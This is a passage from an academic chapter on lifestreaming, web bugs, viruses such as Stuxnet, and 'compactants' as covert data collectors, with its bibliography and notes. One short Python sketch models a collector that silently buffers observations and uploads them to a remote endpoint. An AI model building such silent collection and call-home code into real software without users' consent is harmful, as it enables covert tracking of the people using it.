This kind of self-collection of data is certainly becoming more prevalent and, in the context of reflexivity and self-knowledge, it raises interesting questions: who has access to these intimate archives, how does constant measurement change the behaviour being measured, and what kind of self is produced when it is known chiefly through its data? The scale of the data collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt prove revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile ‘apps’ - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also to search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device - especially if it contains the kinds of sophisticated sensory circuitry common in smartphones - to log GPS location, direction, and so forth. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard that is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- 'Geraldine posted a photo to her album' or 'John shared a video'. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
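&lt;br /&gt;
Following the quoted specification, a single activity is just a small structured record. The sketch below encodes the ‘Geraldine’ example roughly as the JSON serialization would have it (the timestamp, identifiers and URL are invented for illustration): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
import json &lt;br /&gt;
&lt;br /&gt;
# 'Geraldine posted a photo to her album', encoded as an activity with an &lt;br /&gt;
# actor, a verb, an object and a target (values invented for illustration). &lt;br /&gt;
activity = { &lt;br /&gt;
    'published': '2011-02-10T15:04:55Z', &lt;br /&gt;
    'actor': {'objectType': 'person', 'displayName': 'Geraldine'}, &lt;br /&gt;
    'verb': 'post', &lt;br /&gt;
    'object': {'objectType': 'photo', 'url': 'http://example.org/photos/9260'}, &lt;br /&gt;
    'target': {'objectType': 'photo-album', 'displayName': 'Geraldine\'s album'}, &lt;br /&gt;
} &lt;br /&gt;
print(json.dumps(activity, indent=2)) &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;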
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques, such as heat-maps and graph theory, that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and the aggregative use case - in other words, for the individual user (or lifestreamer) as much as for the organization (such as Facebook) - the key is to pattern-match and compare details of the data, such as against a norm, a historical data set, or a population, group, or class of others.[13] &lt;br /&gt;
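&lt;br /&gt;
To make that comparison against a norm concrete, here is a minimal sketch in which a lifestreamer’s daily step counts are checked against their own recent baseline (the data and threshold are invented): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
from statistics import mean, stdev &lt;br /&gt;
&lt;br /&gt;
def flag_anomalies(daily_counts, window=7, threshold=2.0): &lt;br /&gt;
    '''Flag days deviating from the mean of the preceding window by more &lt;br /&gt;
    than threshold standard deviations - the basic pattern-matching move &lt;br /&gt;
    behind most self-tracking dashboards.''' &lt;br /&gt;
    flagged = [] &lt;br /&gt;
    for i in range(window, len(daily_counts)): &lt;br /&gt;
        baseline = daily_counts[i - window:i] &lt;br /&gt;
        mu, sigma = mean(baseline), stdev(baseline) &lt;br /&gt;
        if sigma and abs(daily_counts[i] - mu) &gt; threshold * sigma: &lt;br /&gt;
            flagged.append(i) &lt;br /&gt;
    return flagged &lt;br /&gt;
&lt;br /&gt;
steps = [8000, 8200, 7900, 8100, 8300, 8000, 7800, 2100, 8050, 8120] &lt;br /&gt;
print(flag_anomalies(steps))   # [7]: the 2,100-step day stands out &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;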
&lt;br /&gt;
The patterned usage therefore acts as a dynamic real-time feedback mechanism, providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally amounts to the construction of a hierarchical social structure within the group of users. It also encourages users to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational ‘care of the self’, facilitated by an army of oligoptica (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that make the data make sense. The code and software are therefore responsible for creating and maintaining meaning and narrative, a stabilised web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself: this is data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand such software ecologies (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers and carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, create the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs, learning our habits and preferences in real-time whilst secreting themselves within our computer systems, raises important questions about consent, about who collects, owns and profits from such data, and about how such covert collection might be detected and resisted. Yet users are actively downloading apps that advertise the fact that they collect this data, and seem genuinely to find an existential relief or recognition in their movements being recorded and made available for later playback or analysis. Web bugs, in many ways, are life streams, albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' is designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to draw particular attention to this passive-aggressive feature of computational agents that collect information: they are passive in quality - under the surface, relatively benign and silent - but aggressive in their hoarding of data - monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and of compactness as conciseness in expression. The etymology, from the Latin ''compactus'', closely put together or joined together, also neatly expresses the sense of what web bugs and related technologies are. Compactants are additionally useful in terms of the notion of ''companion actants'' (see Haraway, 2003). &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that are often generated, the computational processing and aggregation are frequently offloaded to the ‘cloud’: server computers designed specifically for the task and accessed via networks. Indeed, many viruses often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
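&lt;br /&gt;
That dichotomous structure - quiet local hoarding on one side, periodic offloading for processing on the other - can be sketched in a few lines of Python (the endpoint and payload format are invented; no real service is implied): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
import json &lt;br /&gt;
import time &lt;br /&gt;
import urllib.request &lt;br /&gt;
&lt;br /&gt;
class Compactant: &lt;br /&gt;
    '''Passive mode: silently buffer observations; the aggressive side is &lt;br /&gt;
    the periodic call home that ships the hoard off for processing.''' &lt;br /&gt;
    def __init__(self, endpoint, batch_size=100): &lt;br /&gt;
        self.endpoint = endpoint &lt;br /&gt;
        self.batch_size = batch_size &lt;br /&gt;
        self.buffer = [] &lt;br /&gt;
&lt;br /&gt;
    def observe(self, signal): &lt;br /&gt;
        # Passive collection: note the observation and stay quiet. &lt;br /&gt;
        self.buffer.append({'t': time.time(), 'signal': signal}) &lt;br /&gt;
        if len(self.buffer) &gt;= self.batch_size: &lt;br /&gt;
            self.call_home() &lt;br /&gt;
&lt;br /&gt;
    def call_home(self): &lt;br /&gt;
        # Aggressive side: upload the batch for aggregation, then reset. &lt;br /&gt;
        request = urllib.request.Request( &lt;br /&gt;
            self.endpoint, &lt;br /&gt;
            data=json.dumps(self.buffer).encode(), &lt;br /&gt;
            headers={'Content-Type': 'application/json'}) &lt;br /&gt;
        urllib.request.urlopen(request) &lt;br /&gt;
        self.buffer = [] &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;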
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo the bad habits and behaviours of the present self. That is, there is an explicit normative orientation towards a ''future'' self, whom you, as the ''present'' self, may be treating unfairly, immorally, or without due regard: what has been described as ‘future self continuity’ (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal representation of time within computational systems, that is, time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and a potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structure many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights, both into our usage of code and software and into the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real - not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not been fully incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering is itself a relatively recent discipline, and that its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attest. Of course, this code/software research is not easy: the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities, we are still developing our understanding. But this should give hope and direction to critical theorists, both those of the present looking to provide critique and counterfactuals, and those ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0, Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume 6, Number 1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture Desire, ''TechCrunch'', accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress, accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994) The cyber-road not taken, ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012, http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Haraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, ''The Smithsonian'', accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies, Locally Stored Objects (LSOs), and Document Object Model storage (DOM storage). &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of virus. Worms spread from computer to computer, often across networks, but, unlike a virus, a worm can transfer itself without any human action. It does so by taking advantage of a computer’s file or information transport features, such as its networking setup, which allow it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code disassembled from the worm, and careful analysis of the internal data structures and finite state machine used to structure the attack. Remarkably, this was then matched by Ralph Langner with photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad; the importance of the cascade structure, centrifuge layout and enriching process was confirmed by careful analysis of background images accidentally photographed on computers used by the president, see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was 03/02/2010 (Matrosov et al., n.d.), although there is suspicion that there may be three versions of the Stuxnet code, revised in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] There are, though, some criticisms that this link may be spurious; for instance, Cryptome (2010) argues: 'It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;, as in Remote Terminal Unit.' &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
